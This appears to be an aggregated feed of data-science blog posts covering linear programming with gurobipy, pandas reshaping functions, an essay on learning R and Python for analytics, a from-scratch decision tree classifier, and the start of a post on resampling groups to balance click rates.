In this article we will discuss how to solve linear programming problems with Gurobipy in Python.
Linear programming (LP) is a tool for solving optimization problems, and it is widely used across many industries.
In this tutorial we will be working with gurobipy library, which is a Gurobi Python interface. Gurobi is one of the most powerful and fastest optimization solvers and the company constantly releases new features. You can learn more about their licenses here.
To continue following this tutorial we will need the following Python library: gurobipy.
If you don’t have it installed, please open “Command Prompt” (on Windows) and install it using the following code:
python -m pip install -i https://pypi.gurobi.com gurobipy
Note: gurobipy includes a limited license to get started with the library and solve some sample optimization problems. If you are planning on solving more complex problems, you will need to get a license.
Linear programming is much easier to understand once we have an example of such an optimization problem.
Consider a manufacturing company which produces two items: cups and plates. Here is what we know:
The company’s goal is to maximize profits (revenue – cost).
Below are the steps we need to solve this linear programming problem:
In any linear programming problem we need to correctly identify the decision variables. What are they? Decision variables are variables that represent a decision made in the problem.
In our case, a company needs to decide how many cups and plates it will produce (the decision). So we define our decision variables as:
$$ x_1 = \textit{# of cups to produce} $$
$$ x_2 = \textit{# of plates to produce} $$
In any optimization problem we want to either maximize or minimize something. In our case, the company wants to maximize profits, therefore our objective function will be a profit maximization.
Recall that our selling price for each cup is $27 and selling price for each plate is $21. We can write the revenue function as:
$$ \textit{Revenue} = 27x_1 + 21x_2 $$
The next part is to define our cost function. We have two parts to it: raw materials and labour.
Recall that for raw materials it costs $10 per cup and $9 per plate:
$$ \textit{Raw materials} = 10x_1 + 9x_2 $$
And for labour it costs $14 per cup and $10 per plate:
$$ \textit{Labour} = 14x_1 + 10x_2 $$
With the above, we can solve for the profit function as:
$$ \textit{Profit} = (27x_1 + 21x_2 )-(10x_1 + 9x_2)-(14x_1 + 10x_2) = 3x_1 + 2x_2$$
And our objective function becomes:
$$ \textit{max z} = 3x_1 + 2x_2$$
First constraint would be the labour hours. We know that each cup takes 2.2 labour hours and each plate takes 1 labour hour. There is also a maximum of 100 labour hours available:
$$ \textit{Constraint 1: } 2.2x_1 + x_2 \leq 100$$
Second constraint would be the demand for plates. We know that the demand for cups is unlimited, but demand for plates is 30 units:
$$ \textit{Constraint 2: } x_2 \leq 30$$
The last two constraints are the sign restrictions for decision variables. In our case, number of both cups and plates produced should be greater or equal to zero:
$$ \textit{Constraint 3: } x_1 \geq 0 $$
$$ \textit{Constraint 4: }x_2 \geq 0 $$
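Since this problem has only two decision variables, the optimum can also be sanity-checked by hand: for an LP, the maximum lies at a corner point of the feasible region. A quick pure-Python sketch (not part of the Gurobi workflow) that evaluates the profit at each vertex:

```python
# Corner points of the feasible region defined by the four constraints:
# 2.2*x1 + x2 <= 100, x2 <= 30, x1 >= 0, x2 >= 0
vertices = [
    (0, 0),
    (0, 30),                 # demand constraint meets the x2-axis
    (100 / 2.2, 0),          # labour constraint meets the x1-axis
    ((100 - 30) / 2.2, 30),  # labour constraint meets the demand constraint
]

def profit(x1, x2):
    return 3 * x1 + 2 * x2

best = max(vertices, key=lambda v: profit(*v))
print(best, profit(*best))  # (31.81..., 30) with profit ~155.45
```

The best vertex is where the labour and demand constraints intersect, which is exactly what the solver will report below.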
Now that we have formulated the optimization problem, we need to solve it using gurobipy in Python.
We begin with importing the library:
from gurobipy import *
Next, we create a new empty model:
m = Model()
Now we can add the \(x_1\) and \(x_2\) variables to the model:
x1 = m.addVar(name="x1")
x2 = m.addVar(name="x2")
Note: we are adding variables without any specifications, allowing the optimal \(x_1\) and \(x_2\) to be any continuous value.
Following the similar steps from the previous part, we add the objective function we created and set it as a maximization problem:
m.setObjective(3*x1 + 2*x2 , GRB.MAXIMIZE)
And add the constraints:
m.addConstr(2.2*x1 + x2 <= 100, "c2")
m.addConstr(x2 <= 30, "c3")
m.addConstr(x1 >= 0, "c4")
m.addConstr(x2 >= 0, "c5")
Finally, run the optimization:
m.optimize()
At this point our linear programming optimization is solved, and we can work on retrieving the results.
We begin with getting the optimal values for \(x_1\) and \(x_2\):
for v in m.getVars():
    print(v.varName, v.x)
And we get:
x1 31.818181
x2 30.0
To maximize profit, the company should produce approximately 31.82 cups and 30 plates. What is the maximized profit?
We can get it from the optimized model:
print('Maximized profit:', m.objVal)
And we get:
Maximized profit: 155.454545
In summary, the maximum profit a company can make is $155.45 while producing 31.82 cups and 30 plates.
from gurobipy import *

# Create a new model
m = Model()

# Create variables
x1 = m.addVar(name="x1")
x2 = m.addVar(name="x2")

# Set objective function
m.setObjective(3*x1 + 2*x2, GRB.MAXIMIZE)

# Add constraints
m.addConstr(2.2*x1 + x2 <= 100, "c2")
m.addConstr(x2 <= 30, "c3")
m.addConstr(x1 >= 0, "c4")
m.addConstr(x2 >= 0, "c5")

# Optimize model
m.optimize()

# Print values for decision variables
for v in m.getVars():
    print(v.varName, v.x)

# Print maximized profit value
print('Maximized profit:', m.objVal)
In reality, can the company produce 31.82 cups? Not really. What we need is some way of generating integers for the \(x_1\) and \(x_2\) decision variables.
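As a quick illustration of how the answer changes under an integrality requirement, we can brute-force the best integer solution over this tiny feasible region in pure Python. This is plain enumeration, not the integer programming approach covered in the linked article:

```python
# Enumerate all integer (x1, x2) pairs satisfying the LP constraints
# 2.2*x1 + x2 <= 100 and 0 <= x2 <= 30, keeping the most profitable pair.
best_profit, best_x1, best_x2 = max(
    (3 * x1 + 2 * x2, x1, x2)
    for x1 in range(46)   # 2.2*x1 <= 100  =>  x1 <= 45
    for x2 in range(31)   # x2 <= 30
    if 2.2 * x1 + x2 <= 100
)
print(best_x1, best_x2, best_profit)  # 32 29 154
```

Notice the integer optimum (32 cups, 29 plates, $154) is not simply the rounded-down LP solution, which is exactly why integer programming needs its own machinery.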
Check out my article on how to solve integer programming problems with Python.
In this article we covered how you can solve a linear programming problem using Gurobi Python interface with gurobipy library.
Feel free to leave comments below if you have any questions or have suggestions for some edits and check out more of my Optimization articles.
The post Linear Programming with Gurobipy in Python appeared first on PyShark.
In this series of posts, we will show you the basics of pandas DataFrames, one of the most useful data science Python libraries ever made. The first post of this series is about reshaping data.
import pandas as pd

df = pd.DataFrame(
    {"A": ['a', 'a', 'a', 'b', 'b', 'b'],
     "B": ['A', 'B', 'C', 'A', 'B', 'C'],
     "C": [4, 5, 6, 7, 8, 9]})
df
   A  B  C
0  a  A  4
1  a  B  5
2  a  C  6
3  b  A  7
4  b  B  8
5  b  C  9
df.pivot(columns='B',values='C',index='A')
B  A  B  C
A
a  4  5  6
b  7  8  9
df = pd.DataFrame({'A': [4, 7], 'B': [5, 8], 'C': [6, 9]})
df
   A  B  C
0  4  5  6
1  7  8  9
df.melt()
  variable  value
0        A      4
1        A      7
2        B      5
3        B      8
4        C      6
5        C      9
df1 = pd.DataFrame(
    {"A": [1, 2, 3],
     "B": [4, 5, 6],
     "C": [7, 8, 9]})
df2 = pd.DataFrame(
    {"A": [10, 11],
     "B": [12, 13],
     "C": [14, 15]})
print(df1)
print(df2)
   A  B  C
0  1  4  7
1  2  5  8
2  3  6  9
    A   B   C
0  10  12  14
1  11  13  15
pd.concat([df1,df2])
    A   B   C
0   1   4   7
1   2   5   8
2   3   6   9
0  10  12  14
1  11  13  15
df = pd.DataFrame({'A': [[1, 2, 3], [4, 5, 6]]})
df
           A
0  [1, 2, 3]
1  [4, 5, 6]
df.explode('A')
   A
0  1
0  2
0  3
1  4
1  5
1  6
df = pd.DataFrame([[0, 1], [2, 3]],
                  index=['A', 'B'],
                  columns=['COL1', 'COL2'])
df
   COL1  COL2
A     0     1
B     2     3
df.stack()
A  COL1    0
   COL2    1
B  COL1    2
   COL2    3
import numpy as np

index = pd.MultiIndex.from_tuples(
    [('A', 'col1'), ('A', 'col2'), ('B', 'col1'), ('B', 'col2')])
df = pd.Series(np.arange(1.0, 5.0), index=index)
df
A  col1    1.0
   col2    2.0
B  col1    3.0
   col2    4.0
df.unstack()
   col1  col2
A   1.0   2.0
B   3.0   4.0
When many hear “data analytics” these days, they think of graphical user interface (GUI)-driven business intelligence (e.g. Tableau), data warehousing (e.g. Snowflake), or data preparation (e.g. Alteryx) platforms. These tools have their place (some more than others) in the analytics stack.
But rather than focus on these tools in my book Advancing into Analytics, I teach readers the two major data programming languages, R and Python. These are often considered data science tools. Many successful analysts don’t know them and don’t see the need. But I believe data analysts have great reason to learn how to code. Here’s why:
If I had a dime for every time I mentioned that analysts spend 50 to 80 percent of their time preparing data, I might not need to write a blog.
So, how do we lighten that load? Traditionally, Excel wonks have made great use of keyboard shortcuts to speed up their workflow. UX research does indeed indicate that using the keyboard shows more productivity gains than using a mouse. Let’s extrapolate that to understand that coding is generally more productive than pointing-and-clicking. Of course, it takes longer to learn the former. So this becomes a break-even decision of code versus GUI.
For the early stages of a project, or one-off needs, a GUI could be fine. But there’s something to be said for “codifying” a project such that it can be automated. In a job with this much grunt work, it’s a learning investment that pays off.
Maybe future technologies can use NLP or augmented reality to provide other options than coding versus GUI. I’m pretty impressed, for example, with the AI-embedded tools of Power BI: start typing what kind of chart you want, and it’ll make its best guess. More stuff like this, and maybe the productivity gains of code versus GUI aren’t so clear. But for now, the calculus is still favorable to learning how to code.
Now, the choice between code and GUI isn’t always so clear-cut. In fact, VBA and now Power Query offer some menu-driven tools to generate syntax. Some business intelligence tools are offering the same for machine learning, usually powered by R or Python behind the scenes.
I don’t know about you, but I nearly always have some requirement that can only be accomplished by coding in these frameworks. Every data project is different — have you ever struggled to search-engine the answer of some task you’re looking to do? GUIs tend to limit your options with the tradeoff that there’s a lower barrier to entry. This isn’t always a tradeoff that rank-and-file analysts can make.
Maybe you can think of code as the engine powering your GUI under the hood. You are a long-haul analyst and need to be able to pop the hood and make the necessary adjustments when the GUI just can’t seem to ignite the fuse. Some coding knowledge is important, even if you’re working with tools that generate it for you.
Origin stories matter, and it’s no different for software. Many low- and no-code tools are proprietary. They may be easier to use and harder to break, but someone’s dropping a lot of money for that convenience and support.
On the other hand, many data programming languages are open source. This means that anyone is free to build on, distribute, or contribute to the software. In other words: open source is great freedom and great responsibility. Closed versus open source offer opposing worldviews, and it’s important to follow the implications of either.
Every analyst should have some direct exposure to open source due to the major impacts it’s had on technology and data in the last decade. What are the pros and cons of open source? What is a package? What is a pull request? Analysts should be able to answer these. They can do it through direct experience in the open source world, by learning R and Python.
I see too many data analysts totally commit to the offerings of one proprietary vendor. This tends to induce myopia in what an analyst knows about (They may start to think their vendor invented the left outer join, which has been around for decades). Committing to one closed source vendor leaves so much off the table in today’s analytics landscape.
Hey, if Microsoft is playing nice with open source, then maybe you should too.
The idea of reproducibility in data is that given the same inputs and processes, the same outputs should result time and again.
Now, a lot of people have piled onto Excel because it’s not always reproducible. It’s easy to lose track of whether someone deleted a column, or where the data behind a graph originally came from before it was chopped up into worksheets. (Power Query busts many of these Excel myths, but let’s overlook that for now.)
The solution to this downside is often to adopt some kind of expensive business intelligence tool. The irony is that while BI tools have their benefits, reproducibility isn’t necessarily one of them: they, like Excel, are GUI-driven, and it can be hard to trace back to the original inputs.
Programming languages like R and Python offer a universe of tools for reproducible research. If, for example, you need to conduct some statistical analysis of a dataset and report your results, I couldn’t imagine doing this anymore without coding. “Show your work” is some solid advice from grade school, and code is a great way to do that in analytics.
Yes, learning to code is a knowledge investment; it is learning a new language, after all. But like learning any language, coding will open new doors for data analysts.
If you want the least friction to open these doors, I suggest you check out my book, Advancing into Analytics: From Excel to Python and R. You may not think of these as data analytics tools, but for the reasons explained above, I find them indispensable for data analysts.
Technical books are curious in a lot of ways, including this one: most technical authors don’t typically teach or write for a living. They’re technicians who happen to write a book. That means that while you may get the most brilliant technical know-how, you may not receive it in a format best suited to understand and retain it. Lots of technical books feel like a battle of wits against the author, and readers quickly lose what tenuous grasp was offered of the material.
Now, I’m by no means a trained instructional designer or learning theorist, and like many academic pursuits I think that the fluff/nugget ratio is pretty high in these fields. But I have spent enough time adjacent to them that I’ve been able to identify those nuggets and incorporate useful learning theories into Advancing into Analytics.
What this means in theory (pun intended) is that Advancing into Analytics is written for you to learn and retain the most knowledge possible, without having to work too hard at it.
Here are some of the topics and techniques I used to do that. I especially rely on Make it Stick: The Science of Successful Learning by Peter C. Brown et al. and Powerful Teaching: Unleash the Science of Learning by Pooja K. Agarwal and Patricia M. Bain for making it happen.
Learning happens by relating new knowledge to existing knowledge. Transfer learning is the practice of explicitly making this connection part of the learning.
I’ve said it before and I’ll say it again: Excel kicks off a great learning path to more advanced analytics. Spreadsheet users know from experience the main operations and tasks of data cleaning and analysis. Technical elites too often sneer at spreadsheets, and attempt to write their audience’s knowledge about data to zero, so they can start from a “purer” approach. Talk about negative yardage!
In my book, I instead directly relate Excel knowledge to broader analytics equivalents:
For example: what does VLOOKUP() tell us about database joins?

Have you ever read and re-read a book, thinking you’ve nailed the content, only to find that you can’t remember any of it when tested? Maybe you even used a highlighter and sticky notes, but to no avail.
The issue with learning this way is that it focuses purely on the consumption of material and not its implementation. To really master a subject, you need to actively apply it to new material. As Pooja K. Agarwal and Patricia M. Bain write in Powerful Teaching: “One of the best ways to make sure something sticks and get stored is to focus on the retrieval stage, not the encoding stage.”
Now, I’ll admit that I tend to skip end-of-chapter book exercises. They’re usually dull (literal) textbook exercises, and it can be hard to find the solutions anyway. Why not just continue reading and keep the book’s momentum going? I’ve noticed that many technical authors don’t even include book exercises, likely for these reasons (and because, let’s be honest, exercises take more work).
I provide exercises for nearly all chapters of Advancing into Analytics, using real-life datasets to practice data exploration and hypothesis testing in Excel, Python and R. What’s more, all exercise solutions are conveniently available in the book’s public GitHub repository. If you read the book, please do these exercises. It’s how you’ll remember the content.
As my business’s name might attest, I am a (mostly erstwhile) musician. One of the many lessons learned from music is the power of interleaving.
It’s tempting to practice a piece from start to end each time, but that’s not so effective. The problem is that gaps may form in the music covered (i.e., you may only practice the beginning of a piece, or your favorite or easiest parts). You can easily fall into a slump when you know what order to expect each time you practice.
A better approach is to mix it up. Pick a random part of a piece and start playing and re-playing. Try sections out-of-order or even backwards. Add some variety to the way in which you practice.
Learning often follows a blocked approach, where one topic is studied very thoroughly before moving onto the next, often in the same order. By contrast, interleaving mixes topics in a spaced, often varying, order.
Advancing into Analytics is arranged into three sections: first, the statistical foundations of analytics are demonstrated in Excel. The reader then learns analytics in R and later Python.
Rather than treat these topics as three disconnected parts, I interleave related concepts among them. For example, readers will recreate the same analysis of a dataset using all three applications. Statistical and data cleaning know-how is introduced and re-introduced in different contexts, so that we’ll conceptualize a data table in Excel, then build it in R and Python.
Now, if you’re thinking that this is how knowledge usually works in reality anyway… well, you’re probably right. Learning tends to be iterative and incremental, and there’s no clean break between mastering one topic and getting started in another. Traditional education isn’t always modeled this way, but Advancing into Analytics is. It’s just not possible to master hypothesis testing, for example, in a single chapter, so you’ll see the topic appear in different contexts throughout the book.
Getting into analytics isn’t easy. In many cases, it literally requires learning a new language (of the programming variety). You’ve got enough on your plate: a battle of wits with a technically gifted but pedagogically unaware author shouldn’t be there.
In Advancing into Analytics, you’ll learn not one but two programming languages. Not only that, you’ll discover hypothesis testing, data wrangling, even a smidge of what could be called machine learning, all in 250 pages. This is possible with the help of learning theory. I hope the book can serve as the straightest path to analytics out there.
Decision trees are one of the most intuitive machine learning algorithms used both for classification and regression. After reading, you’ll know how to implement a decision tree classifier entirely from scratch.
This is the fifth of many upcoming from-scratch articles, so stay tuned to the blog if you want to learn more. The links to the previous articles are located at the end of this piece.
The article is structured as follows:
You can download the corresponding notebook here.
Decision trees are a non-parametric model used for both regression and classification tasks. The from-scratch implementation will take you some time to fully understand, but the intuition behind the algorithm is quite simple.
Decision trees are constructed from only two elements – nodes and branches. We’ll discuss different types of nodes in a bit. If you decide to follow along, the term recursion shouldn’t feel like a foreign language, as the algorithm is based on this concept. You’ll get a crash course in recursion in a couple of minutes, so don’t sweat it if you’re a bit rusty on the topic.
Let’s take a look at an example decision tree first:
As you can see, there are multiple types of nodes:
Depending on the dataset size (both in rows and columns), there are probably thousands to millions of ways the nodes and their conditions can be arranged. So, how do we determine the root node?
In a nutshell, we need to check how every input feature classifies the target variable independently. If none of the features alone is 100% correct in the classification, we can consider these features impure.
To further decide which of the impure features is most pure, we can use the Entropy metric. We’ll discuss the formula and the calculations later, but you should remember that the entropy value ranges from 0 (best) to 1 (worst).
The variable with the lowest entropy is then used as a root node.
To begin training the decision tree classifier, we have to determine the root node. That part has already been discussed.
Then, for every single split, the Information gain metric is calculated. Put simply, it represents an average of all entropy values based on a specific split. We’ll discuss the formula and calculations later, but please remember that the higher the gain is, the better the decision split is.
The algorithm then performs a greedy search – goes over all input features and their unique values, calculates information gain for every combination, and saves the best split feature and threshold for every node.
In this way, the tree is built recursively. The recursion process could go on forever, so we’ll have to specify some exit conditions manually. The most common ones are maximum depth and minimum samples at the node. Both will be discussed later upon implementation.
Once the tree is built, we can make predictions for unseen data by recursively traversing the tree. We can check for the traversal direction (left or right) based on the input data and learned thresholds at each node.
Once the leaf node is reached, the most common value is returned.
And that’s it for the basic theory and intuition behind decision trees. Let’s talk about the math behind the algorithm in the next section.
Decision trees represent much more of a coding challenge than a mathematical one. You’ll only have to implement two formulas for the learning part – entropy and information gain.
Let’s start with entropy. As mentioned earlier, it measures the purity of a split at a node level. Its value ranges from 0 (pure) to 1 (impure).
Here’s the formula for entropy:
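In standard notation, with \(p_i\) the proportion of class \(i\) in the vector \(s\) and the sum running over the classes present, the usual definition is:

$$ E(s) = -\sum_{i} p_i \log_2 p_i $$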
As you can see, it’s a relatively simple equation, so let’s see it in action. Imagine you want to calculate the purity of the following vector:
To summarize, zeros and ones are the class labels with the following counts:
The entropy calculation is as simple as it can be from this point (rounded to five decimal points):
The result of 0.88 indicates the split is nowhere near pure. Let’s repeat the calculation in Python next. The following code implements the entropy(s) formula and calculates it on the same vector:
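The snippet might look like this (a sketch; the 3:7 example vector below is an illustration of a split with entropy of roughly 0.88, not necessarily the article's exact vector):

```python
import numpy as np

def entropy(s):
    """Shannon entropy of a vector of class labels."""
    counts = np.bincount(np.asarray(s, dtype=int))
    probs = counts[counts > 0] / len(s)
    return -np.sum(probs * np.log2(probs))

# Example: 3 zeros and 7 ones -> an impure split
s = [0] * 3 + [1] * 7
print(round(entropy(s), 5))  # 0.88129
```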
The results are shown in the following image:
As you can see, the results are identical, indicating the formula was implemented correctly.
Let’s take a look at the information gain next. It represents an average of all entropy values based on a specific split. The higher the information gain value, the better the decision split is.
Information gain can be calculated with the following formula:
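In its usual form, with \(E\) denoting the entropy above and \(n_{left}\), \(n_{right}\) the sizes of the two child splits out of \(n\) parent samples:

$$ \textit{IG} = E(\textit{parent}) - \left( \frac{n_{left}}{n} E(\textit{left}) + \frac{n_{right}}{n} E(\textit{right}) \right) $$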
Let’s take a look at an example split and calculate the information gain:
As you can see, the entropy values were calculated beforehand, so we don’t have to waste time on them. Calculating information gain is now a trivial process:
Let’s implement it in Python next. The following code snippet implements the information_gain() function and calculates it for the previously discussed split:
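A matching sketch, reusing the entropy() helper from before (the example split below is an illustration, not the article's exact numbers):

```python
import numpy as np

def entropy(s):
    counts = np.bincount(np.asarray(s, dtype=int))
    probs = counts[counts > 0] / len(s)
    return -np.sum(probs * np.log2(probs))

def information_gain(parent, left_child, right_child):
    """Entropy reduction achieved by splitting `parent` into two children."""
    num_left = len(left_child) / len(parent)
    num_right = len(right_child) / len(parent)
    return entropy(parent) - (num_left * entropy(left_child)
                              + num_right * entropy(right_child))

# A perfect split of a 50:50 parent yields the maximum gain of 1.0
parent = [0] * 10 + [1] * 10
print(information_gain(parent, [0] * 10, [1] * 10))  # 1.0
```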
The results are shown in the following image:
As you can see, the values match.
And that’s all there is to the math behind decision trees. I’ll repeat – this algorithm is much more challenging to implement in code than to understand mathematically. That’s why you’ll need an additional primer on recursion – coming up next.
A lot of implementation regarding decision trees boils down to recursion. This section will provide a sneak peek at recursive functions and isn’t by any means a go-to guide to the topic. If this term is new to you, please research it if you want to understand decision trees.
Put simply, a recursive function is a function that calls itself. We don’t want this process going on indefinitely, so the function will need an exit condition. You’ll find it written at the top of the function.
Let’s take a look at the simplest example possible – a recursive function that returns a factorial of an integer:
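A minimal version of the function the article describes:

```python
def factorial(n):
    # Exit condition: stop recursing once n reaches 1
    if n == 1:
        return 1
    # Recursive case: n! = n * (n - 1)!
    return n * factorial(n - 1)

print(factorial(5))  # 120
```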
The results are shown in the following image:
As you can see, the function calls itself until the entered number reaches 1. That’s the exit condition of our function.
Recursion is needed in decision tree classifiers to build additional nodes until some exit condition is met. That’s why it’s crucial to understand this concept.
Up next, we’ll implement the classifier. It will require around 200 lines of code (minus the docstrings and comments), so brace yourself.
We’ll need two classes:

- Node – implements a single node of a decision tree
- DecisionTree – implements the algorithm

Let’s start with the Node class. It is here to store the data about the feature, threshold, data going left and right, information gain, and the leaf node value. All are initially set to None. The root and decision nodes will contain values for everything besides the leaf node value, and the leaf node will contain the opposite.

Here’s the code for the class:
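A sketch consistent with that description (the attribute names here are assumptions, chosen to match the text):

```python
class Node:
    """A single node of a decision tree.

    Root/decision nodes use feature, threshold, data_left, data_right and gain;
    leaf nodes use only value.
    """
    def __init__(self, feature=None, threshold=None,
                 data_left=None, data_right=None, gain=None, value=None):
        self.feature = feature
        self.threshold = threshold
        self.data_left = data_left
        self.data_right = data_right
        self.gain = gain
        self.value = value
```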
That was the easy part. Let’s implement the classifier next. It will contain a bunch of methods, all of which are discussed below:

- __init__() – the constructor, holds values for min_samples_split and max_depth. These are hyperparameters. The first one is used to specify a minimum number of samples required to split a node, and the second one specifies a maximum depth of a tree. Both are used in recursive functions as exit conditions
- _entropy(s) – calculates the impurity of an input vector s
- _information_gain(parent, left_child, right_child) – calculates the information gain value of a split between a parent and two children
- _best_split(X, y) – calculates the best splitting parameters for input features X and a target variable y. It does so by iterating over every column in X and every threshold value in every column to find the optimal split using information gain
- _build(X, y, depth) – recursively builds a decision tree until stopping criteria is met (hyperparameters in the constructor)
- fit(X, y) – calls the _build() function and stores the built tree in the constructor
- _predict(x) – traverses the tree to classify a single instance
- predict(X) – applies the _predict() function to every instance in matrix X

It’s a lot – no arguing there. Take your time to understand every line from the code snippet below. It is well-documented, so the comments should help a bit:
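The full, heavily commented listing lives in the notebook linked above; what follows is only a condensed sketch of one way those methods can fit together (names and defaults are assumptions, and details like tie-breaking are simplified):

```python
import numpy as np

class Node:
    def __init__(self, feature=None, threshold=None,
                 data_left=None, data_right=None, gain=None, value=None):
        self.feature = feature
        self.threshold = threshold
        self.data_left = data_left
        self.data_right = data_right
        self.gain = gain
        self.value = value

class DecisionTree:
    def __init__(self, min_samples_split=2, max_depth=5):
        self.min_samples_split = min_samples_split
        self.max_depth = max_depth
        self.root = None

    @staticmethod
    def _entropy(s):
        counts = np.bincount(np.asarray(s, dtype=int))
        probs = counts[counts > 0] / len(s)
        return -np.sum(probs * np.log2(probs))

    def _information_gain(self, parent, left, right):
        n_l, n_r = len(left) / len(parent), len(right) / len(parent)
        return self._entropy(parent) - n_l * self._entropy(left) - n_r * self._entropy(right)

    def _best_split(self, X, y):
        # Greedy search over every feature and every unique threshold
        best = {'gain': -1.0}
        for f_idx in range(X.shape[1]):
            for threshold in np.unique(X[:, f_idx]):
                mask = X[:, f_idx] <= threshold
                if mask.all() or not mask.any():
                    continue  # a split must send samples both ways
                gain = self._information_gain(y, y[mask], y[~mask])
                if gain > best['gain']:
                    best = {'gain': gain, 'feature': f_idx,
                            'threshold': threshold, 'mask': mask}
        return best

    def _build(self, X, y, depth=0):
        # Exit conditions: too few samples, max depth reached, or no useful split
        if len(y) >= self.min_samples_split and depth < self.max_depth:
            best = self._best_split(X, y)
            if best['gain'] > 0:
                m = best['mask']
                return Node(feature=best['feature'], threshold=best['threshold'],
                            data_left=self._build(X[m], y[m], depth + 1),
                            data_right=self._build(X[~m], y[~m], depth + 1),
                            gain=best['gain'])
        return Node(value=int(np.bincount(y).argmax()))  # leaf: most common label

    def fit(self, X, y):
        self.root = self._build(np.asarray(X, dtype=float), np.asarray(y, dtype=int))
        return self

    def _predict(self, x, node):
        # Recursively traverse until a leaf is reached
        if node.value is not None:
            return node.value
        child = node.data_left if x[node.feature] <= node.threshold else node.data_right
        return self._predict(x, child)

    def predict(self, X):
        return [self._predict(x, self.root) for x in np.asarray(X, dtype=float)]

# Tiny sanity check on a perfectly separable toy dataset
model = DecisionTree().fit([[0.0], [1.0], [2.0], [3.0]], [0, 0, 1, 1])
print(model.predict([[2.5]]))  # [1]
```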
You’re not expected to understand every line of code in one sitting. Give it time, go over the code line by line and try to reason why things work. It’s not that difficult once you understand the basic intuition behind the algorithm.
Let’s test our classifier next. We’ll use the Iris dataset from Scikit-Learn. The following code snippet loads the dataset and separates it into features (X) and the target (y):
Let’s split the dataset into training and testing portions next. The following code snippet does just that, in an 80:20 ratio:
And now let’s do the training. The code snippet below trains the model with default hyperparameters and makes predictions on the test set:
Let’s take a look at the generated predictions (preds):
And now at the actual class labels (y_test):
As you can see, both are identical, indicating a perfectly accurate classifier. You can further evaluate the performance if you want. The code below prints the accuracy score on the test set:
As expected, the value of 1.0 would get printed. Don’t let this fool you – the Iris dataset is incredibly easy to classify correctly, especially if you get a good “random” test set. Still, let’s compare our classifier to the one built into Scikit-Learn.
We want to know if our model is any good, so let’s compare it with something we know works well — a DecisionTreeClassifier class from Scikit-Learn.
You can use the following snippet to import the model class, train the model, make predictions, and print the accuracy score:
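One way this snippet could look (a sketch assuming scikit-learn is installed; the random_state values are my additions for reproducibility and affect which rows land in the test set):

```python
from sklearn.datasets import load_iris
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier

# Load Iris and split 80:20, as in the earlier sections
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.2, random_state=42)

# Train the reference model and score it on the held-out set
sk_model = DecisionTreeClassifier(random_state=42)
sk_model.fit(X_train, y_train)
sk_preds = sk_model.predict(X_test)
print(accuracy_score(y_test, sk_preds))
```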
As you would expect, we get a perfect accuracy score of 1.0.
And that’s all for today. Let’s wrap things up in the next section.
This was one of the most challenging articles I have ever written. It took around a week to get everything right and to make the code as understandable as possible. Naturally, it will take you at least a couple of readings to understand the topic altogether. Feel free to explore additional resources, as it will further advance your understanding.
You now know how to implement the Decision tree classifier algorithm from scratch. Does that mean you should ditch the de facto standard machine learning libraries? No, not at all. Let me elaborate.
Just because you can write something from scratch doesn’t mean you should. Still, knowing every detail of how algorithms work is a valuable skill and can help you stand out from every other fit and predict data scientist.
Thanks for reading, and please stay tuned to the blog if you’re interested in more machine learning from scratch articles.
The post Master Machine Learning: Decision Trees From Scratch With Python appeared first on Better Data Science.
Sometimes when we are working on machine learning projects, there are factors that have a huge impact on performance yet are neither manageable nor structured. A solution is to remove their effect from our data by sampling based on the factor we want to normalize.
Let’s create the data for our example. Suppose that we have a factor called Campaign with the following groups:
import pandas as pd
import numpy as np
import statsmodels.formula.api as smf
import plotly.express as px

Smartphone = pd.DataFrame(
    {
        "Gender": np.random.choice(["m", "f"], 200, p=[0.6, 0.4]),
        "Age": np.random.choice(["[<30]", "[30-65]", "[65 ]"], 200, p=[0.3, 0.6, 0.1]),
        "Add_Color": np.random.choice(["Blue", "Red"], 200, p=[0.6, 0.4]),
        "Campaign": ["Smartphone"] * 200,
        "Click": np.random.binomial(1, size=200, p=0.6),
    }
)
Camera = pd.DataFrame(
    {
        "Gender": np.random.choice(["m", "f"], 200, p=[0.6, 0.4]),
        "Age": np.random.choice(["[<30]", "[30-65]", "[65 ]"], 200, p=[0.3, 0.6, 0.1]),
        "Add_Color": np.random.choice(["Blue", "Red"], 200, p=[0.3, 0.7]),
        "Campaign": ["Camera"] * 200,
        "Click": np.random.binomial(1, size=200, p=0.2),
    }
)
Computer = pd.DataFrame(
    {
        "Gender": np.random.choice(["m", "f"], 200, p=[0.6, 0.4]),
        "Age": np.random.choice(["[<30]", "[30-65]", "[65 ]"], 200, p=[0.3, 0.6, 0.1]),
        "Add_Color": np.random.choice(["Blue", "Red"], 200, p=[0.25, 0.75]),
        "Campaign": ["Computer"] * 200,
        "Click": np.random.binomial(1, size=200, p=0.25),
    }
)
df = pd.concat([Smartphone, Camera, Computer])
df.sample(10)
    Gender      Age Add_Color    Campaign  Click
115      m    [<30]       Red  Smartphone      1
12       m  [30-65]       Red    Computer      0
112      m  [30-65]       Red    Computer      0
148      m    [<30]       Red    Computer      1
127      m    [<30]      Blue    Computer      0
83       f    [<30]       Red  Smartphone      1
168      f  [30-65]       Red    Computer      0
80       f  [30-65]       Red    Computer      0
25       m    [<30]       Red      Camera      0
11       f  [30-65]       Red  Smartphone      0
Below we can see that every group has a different click rate. That would be ok if we wanted to use this feature in our model. However, if we can’t use it (maybe because in the future we may have different campaigns and we want a universal model), we have to somehow remove this effect otherwise we will have a biased model.
print(df.groupby('Campaign').mean())
            Click
Campaign
Camera       0.21
Computer     0.22
Smartphone   0.59
What we want to achieve is to resample every group so that each results in an equal click rate.
In our example, we are working with clicks. So, we have two classes, 0 and 1. What we want to achieve is to have an equal amount of each for every campaign, so the click rate will be 0.5. We will use the pandas function sample: given a DataFrame and a number, it returns that many random rows, without replacement.
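As a toy illustration of sample (the frame below is made up, not the campaign data):

```python
import pandas as pd

df = pd.DataFrame({"Click": [0, 0, 0, 0, 1, 1]})
# Two random rows, without replacement; random_state makes it reproducible
subset = df.sample(2, random_state=7)
print(len(subset))  # 2
```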
The tricky part here is that we have to define the Minority and the Majority class for every campaign because as we can see, the minority class for the Smartphone campaign is class 0 and the minority for Computer and Camera is 1.
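The loop below handles this in full for every campaign; as a minimal sketch of the underlying idea (on a hypothetical toy frame, not the campaign data), downsampling the majority class with sample looks like this:

```python
import pandas as pd

# Toy frame for one campaign: six clicks (1) and three non-clicks (0)
z = pd.DataFrame({"Click": [1, 1, 1, 1, 1, 1, 0, 0, 0]})

counts = z["Click"].value_counts()
minority_label = counts.idxmin()  # here: class 0
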